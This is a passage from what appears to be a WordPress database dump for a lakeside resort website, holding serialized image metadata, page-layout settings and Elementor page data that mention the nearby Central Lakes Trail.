P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1433831428\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00935453695042\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1053,548,'_wp_attached_file','2017/02/DSCN2644.jpg'),(1054,548,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/02/DSCN2644.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2644-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2644-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2644-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2644-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2644-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2644-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2644-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2644-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2644-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2644-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2644-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2644-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1434011828\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"28.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0025075225677\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1055,549,'_wp_attached_file','2017/02/DSCN2723.jpg'),(1056,549,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/02/DSCN2723.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2723-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2723-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2723-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2723-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2723-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2723-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2723-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2723-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2723-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2723-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2723-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2723-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1436849875\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"15.1\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00118008024546\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1057,550,'_wp_attached_file','2017/02/DSC0342.jpg'),(1058,550,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4288;s:6:\"height\";i:2848;s:4:\"file\";s:19:\"2017/02/DSC0342.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0342-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0342-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0342-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0342-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0342-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0342-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0342-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0342-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0342-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0342-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0342-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0342-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472238884\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"90\";s:3:\"iso\";s:4:\"1250\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1059,551,'_wp_attached_file','2017/02/DSCN3462.jpg'),(1060,551,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/02/DSCN3462.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3462-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3462-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3462-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3462-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3462-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3462-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3462-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3462-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3462-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3462-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3462-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3462-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1462004396\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"13.4\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0198412698413\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1061,552,'_wp_attached_file','2017/02/DSCN3828.jpg'),(1062,552,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/02/DSCN3828.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3828-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3828-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3828-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3828-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3828-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3828-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3828-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3828-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3828-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3828-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3828-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3828-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472301135\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"97.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00214915108532\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1084,575,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(1111,43,'vantage_panels_no_legacy','true'),(1112,43,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1114,46,'vantage_panels_no_legacy','true'),(1115,46,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1116,52,'vantage_panels_no_legacy','true'),(1117,52,'siteorigin_page_settings','a:6:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1118,92,'vantage_panels_no_legacy','true'),(1119,92,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1120,92,'_yoast_wpseo_content_score','60'),(1133,37,'vantage_panels_no_legacy','true'),(1134,37,'siteorigin_page_settings','a:6:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1146,17,'vantage_panels_no_legacy','true'),(1148,612,'vantage_panels_no_legacy','true'),(1149,613,'vantage_panels_no_legacy','true'),(1150,64,'_elementor_edit_mode','builder'),(1151,64,'_elementor_data','[{\"id\":\"f9e96ab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"db3737b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"00a00e3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1d5f478\"}]},\"elements\":[{\"id\":\"432c91d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b0f7bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63b0366\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4eb8e34\"}]},\"elements\":[{\"id\":\"7c317a6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2718.jpg\",\"id\":179}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bbac0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73084eb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"06d8a07\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"24d056a\"}]},\"elements\":[{\"id\":\"f22430a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2974.jpg\",\"id\":181}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84e7620\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"779c4aa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"83ff3fa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5589494\"}]},\"elements\":[{\"id\":\"2e41308\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2735.jpg\",\"id\":180}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8b71bdf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a49cb9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c3aa031\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c260443\"}]},\"elements\":[{\"id\":\"0a50016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3007.jpg\",\"id\":182}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c4cd5d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1706dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0cdfb3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f20dd03\"}]},\"elements\":[{\"id\":\"6da7d1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"61061cf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3e077e8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ee05ec\"}]},\"elements\":[{\"id\":\"c101f05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Our Resort is right next to the <a href=\\\"http:\\/\\/centrallakestrail.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Central Lakes Trail <\\/a><\\/h3><p>You can ride 18 miles from the resort to Fergus Falls or 82 miles to St. Joseph by catching the Lake Wobegon Trail.<\\/p><h3>Bring Your Bike the trail is very scenic and level for all ages to enjoy.<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1152,64,'vantage_panels_no_legacy','true'),(1153,615,'_elementor_edit_mode','builder'),(1154,615,'_elementor_data','[{\"id\":\"f9e96ab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"432c91d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7c317a6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2718.jpg\",\"id\":179}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bbac0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f22430a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2974.jpg\",\"id\":181}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84e7620\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2e41308\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2735.jpg\",\"id\":180}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8b71bdf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0a50016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3007.jpg\",\"id\":182}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c4cd5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6da7d1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c101f05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Our Resort is right next to the <a href=\\\"http:\\/\\/centrallakestrail.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Central Lakes Trail <\\/a><\\/h3><p>You can ride 18 miles from the resort to Fergus Falls or 82 